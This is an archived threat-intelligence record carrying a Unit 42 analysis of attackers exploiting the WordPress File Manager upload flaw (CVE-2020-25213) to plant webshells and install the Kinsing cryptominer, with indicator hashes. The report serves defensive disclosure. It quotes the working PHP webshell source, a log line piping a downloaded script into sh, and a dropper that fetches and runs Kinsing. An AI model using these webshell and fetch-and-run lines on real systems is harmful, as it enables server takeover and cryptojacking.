{
	"id": "5a9f300d-e6eb-4a02-be54-0b90d309a699",
	"created_at": "2026-04-06T00:18:29.216308Z",
	"updated_at": "2026-04-10T03:34:59.83469Z",
	"deleted_at": null,
	"sha1_hash": "d38dab3c92d8e4950b83cc3dc3277e40107ff911",
	"title": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 53755,
	"plain_text": "Exploits in the Wild for WordPress File Manager RCE\r\nVulnerability (CVE-2020-25213)\r\nBy Nadav Markus, Efi Barkayev, Gal De Leon\r\nPublished: 2021-02-05 · Archived: 2026-04-05 21:54:59 UTC\r\nExecutive Summary\r\nIn December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213, which is a file upload\r\nvulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an\r\nattacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE)\r\non the targeted web server.\r\nThis exploit was used by attackers to install webshells, which in turn were used to install Kinsing, malware that\r\nruns a malicious cryptominer from the H2miner family. Kinsing is based on the Golang programming language,\r\nand its ultimate purpose is to be used in cryptojacking attacks on container environments.\r\nPalo Alto Networks customers are protected from CVE-2020-25213 and Kinsing with Cortex XDR, AutoFocus\r\nand Next-Generation Firewalls with the WildFire security subscription.\r\nCVE-2020-2513 and Webshells\r\nThe vulnerability stems from the fact that the WordPress File Manager plugin renamed the file extension on the\r\nelFinder library's connector.minimal.php.dist file to .php so it could be executed directly. Since this file has no\r\naccess restrictions, it can be executed by anyone browsing the web server. The file contains mechanisms to upload\r\nfiles to the web server without any authentication. Because of this flaw, allowing anyone to upload files, malicious\r\nactors started attacking it and uploading webshells, which can be used for further activities such as installing\r\nmalware or cryptominers.\r\nObserved Attack Chain\r\nOur investigation began with the access log of an attacked machine. What caught our attention was the following\r\nHTTP POST request to the web server:\r\n[19/Dec/2020:08:58:08 +0000] \"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\r\nHTTP/1.1\" 200 1453 \"-\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/78.0.3904.108 Safari/537.36\"\r\nThis request was used to upload a webshell. Inspecting the log further, we found the culprit – i.e., the webshell:\r\n[19/Dec/2020:08:57:48 +0000] \"GET /wp-content/plugins/wp-file-manager/lib/files/k.php?\r\ncmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1\" 200 411\r\nhttps://unit42.paloaltonetworks.com/cve-2020-25213/\r\nPage 1 of 3\n\nAs we can see from the above, the webshell was named k.php and was provided a command to execute. The\r\nwebshell itself is quite simple as it’s stored in plain text on the web server and contains no obfuscation or\r\nauthentication measures:\r\n\u003c?php if(isset($_REQUEST['cmd'])){ echo \"\u003cpre\u003e\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\r\n\u003c/pre\u003e\"; die; }?\u003e\r\nUpon further examination of the HTTP GET request that was issued to the webshell k.php, we can see it simply\r\ninvoked the curl command, downloaded a file named wpf.sh and executed it.\r\nWe obtained the shell script from the attacker’s command and control (C2) server. Here is a synopsis of the file:\r\n...\r\n$WGET $DIR/kinsing http://X.X.X.X/kinsing\r\nchmod +x $DIR/kinsing\r\n…\r\nSKL=wpf $DIR/kinsing\r\n…\r\nThe file wpf.sh is a script that downloads Kinsing using wget, gives it execute permissions and proceeds to\r\nexecute it.\r\nConclusion\r\nWe observed an exploit in the wild for the WordPress File Manager RCE vulnerability CVE-2020-25213.\r\nAttackers used the exploit to install webshells, which in turn were used to install Kinsing, which runs a malicious\r\ncryptominer from the H2miner family. The ultimate purpose of Kinsing is to be used in cryptojacking attacks on\r\ncontainer environments.\r\nPalo Alto Networks customers are protected from CVE-2020-25213 in the following ways:\r\nThe Linux Cortex XDR agent blocks this attack. The webshell is detected by the local threat evaluation\r\nengine, which is powered by machine learning algorithms.\r\nThe malware has malicious verdicts in WildFire, a security subscription for the Next-Generation Firewall.\r\nThe Cortex XDR Behavioral Threat Protection engine prevents both Kinsing and the payload cryptominer.\r\nPalo Alto Networks Threat Prevention covers this vulnerability with TID 59286.\r\nAutoFocus has an appropriate tag for the miner and Kinsing.\r\nIndicators of Compromise\r\nKinsing Hashes\r\nhttps://unit42.paloaltonetworks.com/cve-2020-25213/\r\nPage 2 of 3\n\n6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b\r\n5f1e0e3cc38f7888b89a9adddb745a341c5f65165dadc311ca389789cc9c6889\r\nCryptominer Hash (H2miner)\r\ndd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839\r\nShell Script Hash\r\na68ab806c8e111e98ba46d5bfdabd9091a68839dd39dfe81e887361bd4994a62\r\nWebshell Hash\r\nf1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794\r\nSource: https://unit42.paloaltonetworks.com/cve-2020-25213/\r\nhttps://unit42.paloaltonetworks.com/cve-2020-25213/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2020-25213/"
	],
	"report_names": [
		"cve-2020-25213"
	],
	"threat_actors": [
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434709,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d38dab3c92d8e4950b83cc3dc3277e40107ff911.pdf",
		"text": "https://archive.orkl.eu/d38dab3c92d8e4950b83cc3dc3277e40107ff911.txt",
		"img": "https://archive.orkl.eu/d38dab3c92d8e4950b83cc3dc3277e40107ff911.jpg"
	}
}